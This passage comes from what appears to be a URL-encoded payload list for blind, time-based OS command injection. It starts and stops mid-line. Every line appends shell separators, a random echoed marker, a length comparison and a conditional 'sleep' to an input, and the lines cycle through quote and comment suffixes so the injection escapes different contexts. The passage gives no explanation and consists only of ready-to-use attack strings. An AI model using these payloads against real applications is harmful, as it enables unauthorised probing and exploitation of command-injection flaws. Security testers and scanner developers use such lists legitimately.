2%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERXFFG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERXFFG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERXFFG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERXFFG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERXFFG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERXFFG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERXFFG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%0A%20str%3D%24%28echo%20BPTQEJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20BPTQEJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20BPTQEJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20BPTQEJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20BPTQEJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20BPTQEJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20BPTQEJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20BPTQEJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20BPTQEJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%3B%20str%3D%24%28echo%20YUQKED%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20YUQKED%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20YUQKED%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20YUQKED%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20YUQKED%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20YUQKED%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20YUQKED%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20YUQKED%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20YUQKED%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%7C%20%5B%201%20-ne%20%24%28echo%20AJEWOJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%202%20-ne%20%24%28echo%20AJEWOJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%203%20-ne%20%24%28echo%20AJEWOJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%204%20-ne%20%24%28echo%20AJEWOJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%205%20-ne%20%24%28echo%20AJEWOJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%206%20-ne%20%24%28echo%20AJEWOJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%207%20-ne%20%24%28echo%20AJEWOJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%208%20-ne%20%24%28echo%20AJEWOJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%209%20-ne%20%24%28echo%20AJEWOJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KZPZZI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KZPZZI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KZPZZI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KZPZZI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KZPZZI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KZPZZI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KZPZZI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KZPZZI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KZPZZI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%0A%20str%3D%24%28echo%20JTPWXS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20JTPWXS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20JTPWXS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20JTPWXS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20JTPWXS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20JTPWXS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20JTPWXS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20JTPWXS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20JTPWXS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%3B%20str%3D%24%28echo%20TGJACN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20TGJACN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20TGJACN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20TGJACN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20TGJACN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20TGJACN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20TGJACN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20TGJACN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20TGJACN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%7C%20%5B%201%20-ne%20%24%28echo%20ZNVKIX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%202%20-ne%20%24%28echo%20ZNVKIX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%203%20-ne%20%24%28echo%20ZNVKIX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%204%20-ne%20%24%28echo%20ZNVKIX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%205%20-ne%20%24%28echo%20ZNVKIX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%206%20-ne%20%24%28echo%20ZNVKIX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%207%20-ne%20%24%28echo%20ZNVKIX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%208%20-ne%20%24%28echo%20ZNVKIX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%209%20-ne%20%24%28echo%20ZNVKIX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OGQLYS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OGQLYS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OGQLYS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OGQLYS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OGQLYS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OGQLYS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OGQLYS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OGQLYS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OGQLYS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%0A%20str%3D%24%28echo%20GNKPOL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20GNKPOL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20GNKPOL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20GNKPOL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20GNKPOL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20GNKPOL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20GNKPOL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20GNKPOL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20GNKPOL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%3B%20str%3D%24%28echo%20DAPKXG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20DAPKXG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20DAPKXG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20DAPKXG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20DAPKXG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20DAPKXG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20DAPKXG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20DAPKXG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20DAPKXG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%7C%20%5B%201%20-ne%20%24%28echo%20QHEWVV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%202%20-ne%20%24%28echo%20QHEWVV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%203%20-ne%20%24%28echo%20QHEWVV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%204%20-ne%20%24%28echo%20QHEWVV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%205%20-ne%20%24%28echo%20QHEWVV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%206%20-ne%20%24%28echo%20QHEWVV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%207%20-ne%20%24%28echo%20QHEWVV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%208%20-ne%20%24%28echo%20QHEWVV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%209%20-ne%20%24%28echo%20QHEWVV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CQWURN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CQWURN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CQWURN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CQWURN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CQWURN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CQWURN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CQWURN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CQWURN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CQWURN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%0A%20str%3D%24%28echo%20WAJEOU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20WAJEOU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20WAJEOU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20WAJEOU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20WAJEOU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20WAJEOU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20WAJEOU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20WAJEOU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20WAJEOU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%3B%20str%3D%24%28echo%20YQOLOU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20YQOLOU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20YQOLOU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20YQOLOU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20YQOLOU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20YQOLOU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3